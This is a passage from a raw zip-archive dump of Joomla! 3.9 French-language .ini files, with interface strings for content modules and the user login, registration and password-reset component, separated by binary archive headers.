MOD_RANDOM_IMAGE_FIELD_WIDTH_DESC="Spécifiez la largeur en pixels à appliquer aux images. Attention forcer une taille spécifique peut altérer la qualité des images !"
MOD_RANDOM_IMAGE_FIELD_WIDTH_LABEL="Largeur (px)"
MOD_RANDOM_IMAGE_NO_IMAGES="Aucune image"
MOD_RANDOM_IMAGE_XML_DESCRIPTION="Ce module affiche une image aléatoire prise dans le dossier spécifié."
PK!^�S��#fr-FR/fr-FR.mod_articles_latest.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_ARTICLES_LATEST="Derniers articles"
MOD_LATEST_NEWS_FIELD_AUTHOR_DESC="Sélectionner un ou plusieurs auteurs."
MOD_LATEST_NEWS_FIELD_AUTHOR_LABEL="Créé par le(s) auteur(s)"
MOD_LATEST_NEWS_FIELD_CATEGORY_DESC="Sélectionnez la ou les catégories desquelles afficher les articles.<br />Si aucune catégorie n'est sélectionnée, les articles de toutes les catégories seront affichés."
MOD_LATEST_NEWS_FIELD_COUNT_DESC="Nombre de titres d'article à afficher (5 par défaut)."
MOD_LATEST_NEWS_FIELD_COUNT_LABEL="Nombre"
MOD_LATEST_NEWS_FIELD_FEATURED_DESC="Afficher/Masquer les articles mis 'En&#160vedette'."
MOD_LATEST_NEWS_FIELD_FEATURED_LABEL="Articles 'En vedette'"
MOD_LATEST_NEWS_FIELD_ORDERING_DESC="Sélectionnez le ou les types d'article qui doivent être affichés."
MOD_LATEST_NEWS_FIELD_ORDERING_LABEL="Classement"
MOD_LATEST_NEWS_FIELD_USER_DESC="Sélectionnez le type d'auteurs desquels afficher les articles."
MOD_LATEST_NEWS_FIELD_USER_LABEL="Auteur(s)"
MOD_LATEST_NEWS_VALUE_ADDED_BY_ME="Créés, publiés ou modifiés par vous (votre compte)"
MOD_LATEST_NEWS_VALUE_ANYONE="Créés, publiés ou modifiés par tous ceux autorisés"
MOD_LATEST_NEWS_VALUE_CREATED_BY="Créé par"
MOD_LATEST_NEWS_VALUE_NOTADDED_BY_ME="Créés, publiés ou modifiés par les autres comptes"
MOD_LATEST_NEWS_VALUE_ONLY_SHOW_FEATURED="N'afficher que les articles 'En vedette'"
MOD_LATEST_NEWS_VALUE_RECENT_ADDED="Derniers articles créés en premier"
MOD_LATEST_NEWS_VALUE_RECENT_MODIFIED="Derniers articles modifiés en premier"
MOD_LATEST_NEWS_VALUE_RECENT_RAND="Articles aléatoires"
MOD_LATEST_NEWS_VALUE_RECENT_PUBLISHED="Derniers articles publiés en premier"
MOD_LATEST_NEWS_VALUE_RECENT_TOUCHED="Derniers articles créés, publiés ou modifiés en premier"
MOD_LATEST_NEWS_XML_DESCRIPTION="Le module 'mod_articles_latest' affiche les titres des derniers articles créés et en cours de publication."
PK!Yj���fr-FR/fr-FR.lib_joomla.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


LIB_JOOMLA="Plateforme Joomla!"
LIB_JOOMLA_XML_DESCRIPTION="La plateforme 'Joomla!' est le noyau du système de gestion de contenu Joomla!"

PK!��m�!fr-FR/fr-FR.mod_related_items.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_RELATED_FIELD_MAX_DESC="Le nombre maximum d'articles en relation à afficher (5 par défaut)"
MOD_RELATED_FIELD_MAX_LABEL="Nombre maximum d'articles"
MOD_RELATED_FIELD_SHOWDATE_DESC="Afficher/Masquer la date des articles."
MOD_RELATED_FIELD_SHOWDATE_LABEL="Date des articles"
MOD_RELATED_ITEMS="Articles en relation"
MOD_RELATED_XML_DESCRIPTION="Le module 'mod_related_items' liste les articles publiés en relation avec celui affiché. Les relations sont effectuées à l'aide des mots-clés attribués aux articles. Par exemple, un article 'Perroquets d'élevage' et un autre 'Cacatoès noir' possédant tous deux le mot-clé 'perroquet' seront considérés en relation."
PK!�M����fr-FR/fr-FR.mod_syndicate.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_SYNDICATE="Lien de flux RSS ou ATOM"
MOD_SYNDICATE_DEFAULT_FEED_ENTRIES="Entrées de flux"
MOD_SYNDICATE_FIELD_DISPLAYTEXT_DESC="Si 'Oui', le texte sera affiché à côté de l'icône"
MOD_SYNDICATE_FIELD_DISPLAYTEXT_LABEL="Afficher le texte"
MOD_SYNDICATE_FIELD_FORMAT_DESC="Choisissez le format du flux d'informations."
MOD_SYNDICATE_FIELD_FORMAT_LABEL="Format du flux"
MOD_SYNDICATE_FIELD_TEXT_DESC="Saisissez le texte à afficher au côté du lien de l'icône de flux."
MOD_SYNDICATE_FIELD_TEXT_LABEL="Texte de l'élément"
MOD_SYNDICATE_FIELD_VALUE_ATOM="Atom 1.0"
MOD_SYNDICATE_FIELD_VALUE_RSS="RSS 2.0"
MOD_SYNDICATE_XML_DESCRIPTION="Le module 'mod_syndicate' affiche un lien de flux RSS ou ATOM pour permettre d'afficher le contenu de la page où il se situe sur un autre site ou dans des lecteurs de fils d'actualités."
PK!2���$fr-FR/fr-FR.lib_idna_convert.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


LIB_IDNA="IDNA Convert"
LIB_IDNA_XML_DESCRIPTION="La classe idna_convert permet de convertir les noms de domaine internationaux (see RFC 3490, 3491, 3492 and 3454 pour détails) car ils peuvent être utilisés dans de nombreux registres mondiaux pour être traduits entre leur forme originale (locale) et leur forme encodée pour être utilisée dans le DNS (Domain Name System)."

PK!�O�� fr-FR/fr-FR.mod_users_latest.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_USERS_LATEST="Derniers inscrits"
MOD_USERS_LATEST_FIELD_FILTER_GROUPS_DESC="Activer/Désactiver l'affichage par groupe des derniers utilisateurs inscrits."
MOD_USERS_LATEST_FIELD_FILTER_GROUPS_LABEL="Afficher par groupe"
MOD_USERS_LATEST_FIELD_LINKTOWHAT_DESC="Sélectionnez le type d'informations utilisateur à afficher."
MOD_USERS_LATEST_FIELD_LINKTOWHAT_LABEL="Informations utilisateur"
MOD_USERS_LATEST_FIELD_NUMBER_DESC="Spécifiez par une valeur numérique le nombre des derniers utilisateurs inscrits à afficher."
MOD_USERS_LATEST_FIELD_NUMBER_LABEL="Nombre d'utilisateurs"
MOD_USERS_LATEST_FIELD_VALUE_CONTACT="Contact"
MOD_USERS_LATEST_FIELD_VALUE_PROFILE="Profil"
MOD_USERS_LATEST_XML_DESCRIPTION="Le module 'mod_users_latest' affiche une liste des derniers utilisateurs inscrits sur le site."
PK!D�C��N�Nfr-FR/fr-FR.com_users.ininu&1i�; @date        2014-09-17
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


COM_USERS_ACTIVATION_TOKEN_NOT_FOUND="Code de vérification introuvable. Vérifiez que votre compte est déjà activé et essayez de vous connecter."
COM_USERS_CAPTCHA_LABEL="Captcha"
COM_USERS_CAPTCHA_DESC="Veuillez compléter le contrôle de sécurité."
COM_USERS_DATABASE_ERROR="Erreur de récupération dans la base de données de l'utilisateur&#160;: %s"
COM_USERS_DESIRED_PASSWORD="Saisissez un mot de passe"
COM_USERS_DESIRED_USERNAME="Choisissez un identifiant"
COM_USERS_EDIT_PROFILE="Modifier le Profil"
COM_USERS_EMAIL_ACCOUNT_DETAILS="Détails du compte utilisateur de %s à %s"
COM_USERS_EMAIL_ACTIVATE_WITH_ADMIN_ACTIVATION_BODY="Bonjour,\n\nUn nouvel utilisateur s'est inscrit sur %s.\nL'utilisateur a confirmé son adresse e-mail et attend que vous approuviez son compte.\nCe message contient ses détails :\n\n  Nom :  %s \n  E-mail:  %s \n Identifiant :  %s \n\nVous pouvez activer son compte en cliquant sur le lien ci-dessous :\n %s \n"
COM_USERS_EMAIL_ACTIVATE_WITH_ADMIN_ACTIVATION_SUBJECT="Une approbation de l'inscription est requise pour le compte de %s sur %s"
COM_USERS_EMAIL_ACTIVATED_BY_ADMIN_ACTIVATION_BODY="Bonjour %s,\n\nVotre compte a été activé par un administrateur. Vous pouvez désormais vous connecter sur %s en utilisant l'identifiant %s et le mot de passe que vous avez choisi lors de votre inscription."
COM_USERS_EMAIL_ACTIVATED_BY_ADMIN_ACTIVATION_SUBJECT="Compte activé pour %s sur %s"
COM_USERS_EMAIL_PASSWORD_RESET_BODY="Bonjour,\n\nVous avez effectué une demande de réinitialisation du mot de passe de votre compte %s. Pour le réinitialiser, vous devrez saisir le code de vérification afin de confirmer qu'il s'agit bien d'une demande légitime. \n\nLe code de vérification est %s\n\nCliquez sur l'URL ci-dessous pour entrer ce code de vérification et pouvoir ensuite créer un nouveau mot de passe.\n\n %s \n\nMerci."
COM_USERS_EMAIL_PASSWORD_RESET_SUBJECT="Votre demande de réinitialisation de mot de passe pour %s"
COM_USERS_EMAIL_REGISTERED_BODY="Bonjour %s. \n\nMerci de votre inscription sur %s.\n\nVous pouvez désormais vous connecter à %s avec votre identifiant et mot de passe :\n\nIdentifiant : %s\nMot de passe : %s"
COM_USERS_EMAIL_REGISTERED_BODY_NOPW="Bonjour %s. \n\n Merci de votre inscription sur %s.\n\n Vous pouvez désormais vous connecter à %s avec le nom d'utilisateur et le mot de passe que vous avez choisi"
COM_USERS_EMAIL_REGISTERED_NOTIFICATION_TO_ADMIN_BODY="Bonjour administrateur, \nCette notification vous informe de l'inscription sur le site de l'utilisateur '%s' avec l'identifiant '%s'."
COM_USERS_EMAIL_REGISTERED_WITH_ACTIVATION_BODY="Bonjour %s,\n\nMerci de vous être inscrit sur %s. Votre compte a été créé et doit être activé avant que vous puissiez l'utiliser. \nPour l'activer, cliquez sur le lien ci-dessous ou copiez et collez le dans votre navigateur :\n%s \n\nAprès activation vous pourrez vous connecter à %s en utilisant l'identifiant et le mot de passe suivants :\nIdentifiant : %s\nMot de passe : %s"
COM_USERS_EMAIL_REGISTERED_WITH_ACTIVATION_BODY_NOPW="Bonjour %s,\n\nMerci de vous être inscrit sur %s. Votre compte a été créé et doit être activé avant que vous puissiez l'utiliser. \nPour l'activer, cliquez sur le lien ci-dessous ou copiez et collez le dans votre navigateur :\n%s \n\nAprès activation vous pourrez vous connecter sur %s en utilisant l'identifiant suivant et le mot de passe utilisé à l'enregistrement :\nIdentifiant : %s"
COM_USERS_EMAIL_REGISTERED_WITH_ADMIN_ACTIVATION_BODY="Bonjour %s,\n\nMerci de vous être inscrit sur %s. Votre compte a été créé et doit être activé avant que vous puissiez l'utiliser. \nPour l'activer, cliquez sur le lien ci-dessous ou copiez et collez le dans votre navigateur :\n%s \n\nAprès cette activation, un administrateur sera averti afin de valider votre compte. Vous recevrez alors un message de confirmation.\nUne fois que ce compte aura été validé, vous pourrez vous connecter sur %s en utilisant l'identifiant et le mot de passe suivants :\n\nIdentifiant: %s\nMot de passe: %s"
COM_USERS_EMAIL_REGISTERED_WITH_ADMIN_ACTIVATION_BODY_NOPW="Bonjour %s,\n\nMerci de vous être inscrit sur %s. Votre compte a été créé et doit être activé avant que vous puissiez l'utiliser. \nPour l'activer, cliquez sur le lien ci-dessous ou copiez et collez le dans votre navigateur :\n%s \n\nAprès cette activation, un administrateur sera averti afin de valider votre compte. Vous recevrez alors un message de confirmation.\nUne fois que ce compte aura été validé, vous pourrez vous connecter sur %s en utilisant l'identifiant suivant et le mot de passe utilisé à l'enregistrement :\n\nIdentifiant: %s"
COM_USERS_EMAIL_USERNAME_REMINDER_BODY="Bonjour,\n\nUne demande de rappel d'identifiant a été demandée pour votre compte %s.\n\nVotre identifiant est %s.\n\nPour vous connecter à votre compte, cliquez sur le lien ci-dessous.\n\n%s \n\nMerci."
COM_USERS_EMAIL_USERNAME_REMINDER_SUBJECT="Votre identifiant %s"
COM_USERS_ERROR_SECRET_CODE_WITHOUT_TFA="Vous avez saisi un code secret mais l'authentification en deux étapes n'est pas activée dans vote compte d'utilisateur. Si vous désirez utiliser un code secret pour sécuriser votre connexion, merci d'éditer votre profil d'utilisateur et d'activer l'authentification en deux étapes."
COM_USERS_FIELD_PASSWORD_RESET_DESC="Veuillez saisir l'adresse e-mail associée à votre compte d'utilisateur.<br />Un code de vérification vous sera adressé. Lorsque vous le recevrez, vous pourrez choisir un nouveau mot de passe."
COM_USERS_FIELD_PASSWORD_RESET_LABEL="Adresse e-mail"
COM_USERS_FIELD_REMIND_EMAIL_DESC="Veuillez saisir l'adresse e-mail associée à votre compte d'utilisateur.<br />Votre identifiant vous sera adressé par e-mail."
COM_USERS_FIELD_REMIND_EMAIL_LABEL="Adresse e-mail"
COM_USERS_FIELD_RESET_CONFIRM_TOKEN_DESC="Saisissez le code de vérification que vous avez reçu par e-mail."
COM_USERS_FIELD_RESET_CONFIRM_TOKEN_LABEL="Code de vérification"
COM_USERS_FIELD_RESET_CONFIRM_USERNAME_DESC="Saisissez votre identifiant"
COM_USERS_FIELD_RESET_CONFIRM_USERNAME_LABEL="Identifiant"
COM_USERS_FIELD_RESET_PASSWORD1_DESC="Saisissez votre nouveau mot de passe"
COM_USERS_FIELD_RESET_PASSWORD1_LABEL="Mot de passe"
COM_USERS_FIELD_RESET_PASSWORD1_MESSAGE="Les mots de passe que vous avez saisis ne correspondent pas. Veuillez saisir votre nouveau mot de passe dans le champ 'mot de passe' et le confirmer dans le champ de confirmation."
COM_USERS_FIELD_RESET_PASSWORD2_DESC="Confirmez votre nouveau mot de passe"
COM_USERS_FIELD_RESET_PASSWORD2_LABEL="Confirmer le mot de passe"
COM_USERS_INVALID_EMAIL="Adresse e-mail non valide"
COM_USERS_LOGIN_DEFAULT_LABEL="Authentification"
COM_USERS_LOGIN_IMAGE_ALT="Image de connexion"
COM_USERS_LOGIN_REGISTER="Pas encore de compte ?"
COM_USERS_LOGIN_REMEMBER_ME="Se rappeler de moi"
COM_USERS_LOGIN_REMIND="Identifiant oublié ?"
COM_USERS_LOGIN_RESET="Mot de passe oublié ?"
COM_USERS_LOGIN_USERNAME_LABEL="Identifiant"
COM_USERS_MAIL_FAILED="Impossible d'envoyer l'e-mail."
COM_USERS_MAIL_SEND_FAILURE_BODY="Une erreur est survenue lors de l'envoi de l'e-mail d'inscription. L'erreur est : %s L'utilisateur qui tentait de s'inscrire est : %s"
COM_USERS_MAIL_SEND_FAILURE_SUBJECT="Erreur lors de l'envoi de l'e-mail"
COM_USERS_MSG_NOT_ENOUGH_INTEGERS_N="Le mot de passe ne contient pas assez de chiffres. Il doit contenir au moins %s chiffres."
COM_USERS_MSG_NOT_ENOUGH_INTEGERS_N_1="Le mot de passe ne contient pas assez de chiffres. Il doit contenir au moins 1 chiffre."
COM_USERS_MSG_NOT_ENOUGH_LOWERCASE_LETTERS_N="Le mot de passe ne contient pas assez de minuscules. Il doit contenir au moins %s minuscules."
COM_USERS_MSG_NOT_ENOUGH_LOWERCASE_LETTERS_N_1="Le mot de passe ne contient pas assez de minuscules. Il doit contenir au moins 1 minuscule."
COM_USERS_MSG_NOT_ENOUGH_SYMBOLS_N="Le mot de passe ne contient pas assez de symboles (tels que !@#$). Il doit contenir au moins %s symboles."
COM_USERS_MSG_NOT_ENOUGH_SYMBOLS_N_1="Le mot de passe ne contient pas assez de symboles (tels que !@#$). Il doit contenir au moins 1 symbole."
COM_USERS_MSG_NOT_ENOUGH_UPPERCASE_LETTERS_N="Le mot de passe ne contient pas assez de majuscules. Il doit contenir au moins %s majuscules."
COM_USERS_MSG_NOT_ENOUGH_UPPERCASE_LETTERS_N_1="Le mot de passe ne contient pas assez de majuscules. Il doit contenir au moins 1 majuscule."
COM_USERS_MSG_PASSWORD_TOO_LONG="Le mot de passe est trop long. Les mots de passe doivent contenir moins de 100 caractères."
COM_USERS_MSG_PASSWORD_TOO_SHORT_N="Le mot de passe est trop court. Les mots de passe doivent contenir au moins %s caractères."
COM_USERS_MSG_SPACES_IN_PASSWORD="Le mot de passe ne doit pas contenir d'espaces au début et à la fin."
COM_USERS_OPTIONAL="(facultatif)"
COM_USERS_OR="ou"
COM_USERS_PROFILE="Profil utilisateur"
COM_USERS_PROFILE_BIND_FAILED="Impossible de lier les données du profil: %s"
COM_USERS_PROFILE_CORE_LEGEND="Profil"
COM_USERS_PROFILE_CUSTOM_LEGEND="Profil personnalisé"
COM_USERS_PROFILE_DEFAULT_LABEL="Modifier votre Profil"
COM_USERS_PROFILE_EMAIL1_DESC="Saisissez votre adresse e-mail"
COM_USERS_PROFILE_EMAIL1_LABEL="Adresse e-mail"
; The following string is deprecated and will be removed with 4.0
COM_USERS_PROFILE_EMAIL1_MESSAGE="L'adresse e-mail que vous avez saisie existe déjà ou n'est pas valide. Veuillez saisir une autre adresse e-mail."
COM_USERS_PROFILE_EMAIL2_DESC="Confirmez votre adresse e-mail"
COM_USERS_PROFILE_EMAIL2_LABEL="Confirmer l'adresse e-mail"
COM_USERS_PROFILE_EMAIL2_MESSAGE="Les deux adresses e-mail que vous avez saisies ne concordent pas. Veuillez saisir votre adresse e-mail dans le champ 'adresse e-mail' et la confirmer dans le champ de confirmation."
COM_USERS_PROFILE_LAST_VISITED_DATE_LABEL="Dernière visite"
COM_USERS_PROFILE_MY_PROFILE="Mon profil"
COM_USERS_PROFILE_NAME_DESC="Saisissez votre nom complet"
COM_USERS_PROFILE_NAME_LABEL="Nom"
COM_USERS_PROFILE_NEVER_VISITED="C'est la première fois que vous visitez ce site"
COM_USERS_PROFILE_NOCHANGE_USERNAME_DESC="Si vous souhaitez modifier votre identifiant (nom d'utilisateur), veuillez svp contacter un administrateur du site."
COM_USERS_PROFILE_OTEPS="Mots de passe d'urgence à utilisation unique"
COM_USERS_PROFILE_OTEPS_DESC="Si vous n'avez pas accès à votre matériel d'authentification en deux étapes, vous pouvez utiliser n'importe lequel des mots de passe suivants au lieu d'un code de sécurité régulier. Chacun de ces mots de passe d'urgence est immédiatement détruit après utilisation. Nous recommandons d'imprimer ces mots de passe et garder la sortie sur imprimante dans un endroit sûr et accessible, par ex. votre portefeuille ou un coffre."
COM_USERS_PROFILE_OTEPS_WAIT_DESC="Il n'y a pas en ce moment de mots de passe d'urgence à utilisation unique disponibles dans votre compte. Les mots de passe seront créés automatiquement et affiché ici dès que l'authentification en deux étapes sera activée."
COM_USERS_PROFILE_PASSWORD1_LABEL="Mot de passe"
COM_USERS_PROFILE_PASSWORD1_MESSAGE="Les mots de passe que vous avez saisis ne correspondent pas. Veuillez saisir votre mot de passe dans le champ 'mot de passe' et le confirmer dans le champ de confirmation."
COM_USERS_PROFILE_PASSWORD2_DESC="Confirmez votre mot de passe"
COM_USERS_PROFILE_PASSWORD2_LABEL="Confirmation"
COM_USERS_PROFILE_REGISTERED_DATE_LABEL="Enregistrement"
COM_USERS_PROFILE_SAVE_FAILED="Le Profil ne peut être enregistré&#160;: %s"
COM_USERS_PROFILE_SAVE_SUCCESS="Profil enregistré"
COM_USERS_PROFILE_TWO_FACTOR_AUTH="Authentification en deux étapes"
COM_USERS_PROFILE_TWOFACTOR_LABEL="Méthode d'authentification"
COM_USERS_PROFILE_TWOFACTOR_DESC="Sélectionner la méthode d'authentification en deux étapes que vous désirez utiliser."
COM_USERS_PROFILE_USERNAME_DESC="Saisissez l'identifiant souhaité"
COM_USERS_PROFILE_USERNAME_LABEL="Identifiant"
COM_USERS_PROFILE_USERNAME_MESSAGE="L'identifiant que vous souhaitez n'est pas disponible. Veuillez en choisir un autre."
COM_USERS_PROFILE_VALUE_NOT_FOUND="Aucune Information saisie"
COM_USERS_PROFILE_WELCOME="Bienvenue, %s"
COM_USERS_REGISTER_DEFAULT_LABEL="Créer un compte"
COM_USERS_REGISTER_EMAIL1_DESC="Saisissez votre adresse e-mail"
COM_USERS_REGISTER_EMAIL1_LABEL="Adresse e-mail"
; The following string is deprecated and will be removed with 4.0
COM_USERS_REGISTER_EMAIL1_MESSAGE="L'adresse e-mail que vous avez saisie existe déjà ou n'est pas valide. Veuillez saisir une autre adresse e-mail."
COM_USERS_REGISTER_EMAIL2_DESC="Confirmez votre adresse e-mail"
COM_USERS_REGISTER_EMAIL2_LABEL="Confirmer l'adresse e-mail"
COM_USERS_REGISTER_EMAIL2_MESSAGE="Les deux adresses e-mail que vous avez saisies ne concordent pas. Veuillez saisir votre adresse e-mail dans le champ 'adresse e-mail' et la confirmer dans le champ de confirmation."
COM_USERS_REGISTER_NAME_DESC="Saisissez votre nom complet"
COM_USERS_REGISTER_NAME_LABEL="Nom"
COM_USERS_REGISTER_PASSWORD1_LABEL="Mot de passe"
COM_USERS_REGISTER_PASSWORD1_MESSAGE="Les mots de passe que vous avez saisis ne correspondent pas. Veuillez saisir votre mot de passe dans le champ 'mot de passe' et le confirmer dans le champ de confirmation."
COM_USERS_REGISTER_PASSWORD2_DESC="Confirmez votre mot de passe"
COM_USERS_REGISTER_PASSWORD2_LABEL="Confirmez le mot de passe"
COM_USERS_REGISTER_REQUIRED="<strong class='red'>*</strong> Champ requis"
COM_USERS_REGISTER_USERNAME_DESC="Saisissez l'identifiant souhaité"
COM_USERS_REGISTER_USERNAME_LABEL="Identifiant"
COM_USERS_REGISTER_USERNAME_MESSAGE="L'identifiant que vous souhaitez n'est pas disponible. Veuillez en choisir un autre."
COM_USERS_REGISTRATION="Création de compte"
COM_USERS_REGISTRATION_ACL_ADMIN_ACTIVATION="Veuillez vous connecter pour confirmer que vous êtes autorisé à activer de nouveaux comptes."
COM_USERS_REGISTRATION_ACL_ADMIN_ACTIVATION_PERMISSIONS="Vous n'êtes pas autorisé à activer de nouveaux comptes, veuillez vous connecter avec un compte privilégié."
COM_USERS_REGISTRATION_ACTIVATE_SUCCESS="Votre compte a été activé. Vous pouvez désormais vous connecter en utilisant l'identifiant et le mot de passe que vous avez choisi lors de votre inscription."
COM_USERS_REGISTRATION_ACTIVATION_NOTIFY_SEND_MAIL_FAILED="Une erreur est survenue lors de l'envoi de l'e-mail de notification d'activation"
COM_USERS_REGISTRATION_ACTIVATION_SAVE_FAILED="Impossible d'enregistrer les données d'activation&#160;: %s"
COM_USERS_REGISTRATION_ADMINACTIVATE_SUCCESS="Le compte d'utilisateur a bien été activé et l'utilisateur en a été informé."
COM_USERS_REGISTRATION_BIND_FAILED="Impossible de lier les données d'inscription&#160; : %s"
COM_USERS_REGISTRATION_COMPLETE_ACTIVATE="Votre compte a été créé et un lien d'activation vous a été adressé par e-mail à l'adresse que vous avez donnée. Notez que vous devrez activer ce compte en cliquant sur le lien d'activation avant de pouvoir vous connecter sur le site."
COM_USERS_REGISTRATION_COMPLETE_VERIFY="Votre compte a été créé et un lien d'activation vous a été adressé par e-mail à l'adresse que vous avez donnée. Notez que vous devrez activer ce compte en cliquant sur le lien d'activation, puis un administrateur devra valider votre compte avant que vous puissiez vous connecter."
COM_USERS_REGISTRATION_DEFAULT_LABEL="Création de compte"
COM_USERS_REGISTRATION_SAVE_FAILED="Enregistrement impossible&#160; : %s"
COM_USERS_REGISTRATION_SAVE_SUCCESS="Merci de vous être inscrit. Vous pouvez désormais vous connecter en utilisant l'identifiant et le mot de passe que vous avez créés."
COM_USERS_REGISTRATION_SEND_MAIL_FAILED="Une erreur est survenue lors de l'envoi de l'e-mail de notification d'inscription. Un message a été adressé à l'administrateur du site."
COM_USERS_REGISTRATION_VERIFY_SUCCESS="Votre adresse e-mail a été vérifiée. Dès qu'un administrateur aura approuvé votre compte, vous en serez informé par e-mail et vous pourrez ensuite vous connecter au site."
COM_USERS_REMIND="Rappel"
COM_USERS_REMIND_DEFAULT_LABEL="Veuillez saisir l'adresse e-mail associée à votre compte d'utilisateur. Votre identifiant vous sera envoyé à cette adresse."
COM_USERS_REMIND_EMAIL_LABEL="Votre e-mail"
COM_USERS_REMIND_LIMIT_ERROR_N_HOURS="Vous avez dépassé le nombre autorisé de réinitialisations. Veuillez réessayer dans %s heures."
COM_USERS_REMIND_LIMIT_ERROR_N_HOURS_1="Vous avez dépassé le nombre autorisé de réinitialisations de mot de passe. Veuillez réessayer dans 1 heure."
COM_USERS_REMIND_REQUEST_ERROR="Erreur de requête de rappel de mot de passe."
COM_USERS_REMIND_REQUEST_FAILED="Rappel d'identifiant impossible&#160;: %s"
COM_USERS_REMIND_REQUEST_SUCCESS="Rappel d'identifiant envoyé. Surveillez votre boîte mail."
COM_USERS_REMIND_SUPERADMIN_ERROR="Un Super Utilisateur ne peut pas demander une réinitialisation de mot de passe. Veuillez contacter un autre Super Utilisateur ou utiliser une autre méthode."
COM_USERS_RESET="Réinitialisation de mot de passe"
COM_USERS_RESET_COMPLETE_ERROR="Erreur lors de la réinitialisation du mot de passe."
COM_USERS_RESET_COMPLETE_FAILED="La réinitialisation du mot de passe a échoué&#160; : %s"
COM_USERS_RESET_COMPLETE_LABEL="Pour terminer la ré-initialisation de votre mot de passe, veuillez saisir un <strong>nouveau mot de passe</strong>."
COM_USERS_RESET_COMPLETE_SUCCESS="Réinitialisation du mot de passe réussie. Vous pouvez maintenant vous connecter au site."
COM_USERS_RESET_CONFIRM_ERROR="Erreur lors de la confirmation du mot de passe."
COM_USERS_RESET_CONFIRM_FAILED="La réinitialisation de votre mot de passe est impossible car le code de vérification n'est pas valide. %s"
COM_USERS_RESET_CONFIRM_LABEL="Un e-mail a été envoyé à votre adresse e-mail. Cet e-mail contient un code de vérification : veuillez coller ce code dans le champ ci-dessous pour prouver que vous êtes bien le détenteur de ce compte."
COM_USERS_RESET_COMPLETE_TOKENS_MISSING="La réinitialisation de votre mot de passe est impossible car le code de vérification est absent."
COM_USERS_RESET_REQUEST_ERROR="Erreur lors de la réinitialisation du mot de passe."
COM_USERS_RESET_REQUEST_FAILED="Réinitialisation du mot de passe échouée&#160; : %s"
COM_USERS_RESET_REQUEST_LABEL="Veuillez saisir l'adresse e-mail associée à votre compte d'utilisateur. Un code de vérification vous sera adressé. Lorsque vous le recevrez, vous pourrez choisir un nouveau mot de passe"
COM_USERS_SETTINGS_FIELDSET_LABEL="Paramètres de base"
COM_USERS_USER_BLOCKED="Cet utilisateur est bloqué. S'il s'agit d'une erreur, veuillez contacter un administrateur."
COM_USERS_USER_FIELD_BACKEND_LANGUAGE_DESC="Choisissez la langue pour le côté administration du site"
COM_USERS_USER_FIELD_BACKEND_LANGUAGE_LABEL="Langue de l'administration"
COM_USERS_USER_FIELD_BACKEND_TEMPLATE_DESC="Choisissez le template de l'interface d'administration à appliquer pour cet utilisateur."
COM_USERS_USER_FIELD_BACKEND_TEMPLATE_LABEL="Template Administration"
COM_USERS_USER_FIELD_EDITOR_DESC="Choisissez votre éditeur de texte"
COM_USERS_USER_FIELD_EDITOR_LABEL="Éditeur"
COM_USERS_USER_FIELD_FRONTEND_LANGUAGE_DESC="Choisissez la langue pour le côté public du site"
COM_USERS_USER_FIELD_FRONTEND_LANGUAGE_LABEL="Langue du site"
; The following two strings are deprecated and will be removed with 4.0.
COM_USERS_USER_FIELD_HELPSITE_DESC="Site d'aide pour l'administration"
COM_USERS_USER_FIELD_HELPSITE_LABEL="Site d'Aide"
COM_USERS_USER_FIELD_TIMEZONE_DESC="Choisissez votre fuseau horaire"
COM_USERS_USER_FIELD_TIMEZONE_LABEL="Fuseau horaire"
COM_USERS_USER_NOT_FOUND="Utilisateur non trouvé"
COM_USERS_USER_SAVE_FAILED="Impossible d'enregistrer l'utilisateur&#16; %s"
PK!�p���"fr-FR/fr-FR.lib_ic_library.sys.ininu&1i�; iC Library
; Copyright (c) 2013-2019 Cyril Rezé (www.joomlic.com). All rights reserved.
; License GNU General Public License version 3 or later <http://www.gnu.org/licenses/gpl.html>
; Note : All ini files need to be saved as UTF-8 - No BOM
;
; SITE                 : lib_ic_library.sys.ini
; Translation Platform : https://www.transifex.com/joomlic/icagenda

; Common boolean values
; Note: YES, NO, TRUE, FALSE are reserved words in INI format.
; Double quotes in the values have to be formatted as "_QQ_"

ICLIB_XML_DESCRIPTION="iC Library est une librarie qui fournit un ensemble de fonctions pour le CMS Joomla! et les extensions JoomliC"

PK!��&���fr-FR/fr-FR.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<metafile version="3.9" client="site">
	<tag>fr-FR</tag>
	<name>French (France)</name>
	<version>3.9.24.1</version>
	<creationDate>2020-12-17</creationDate>
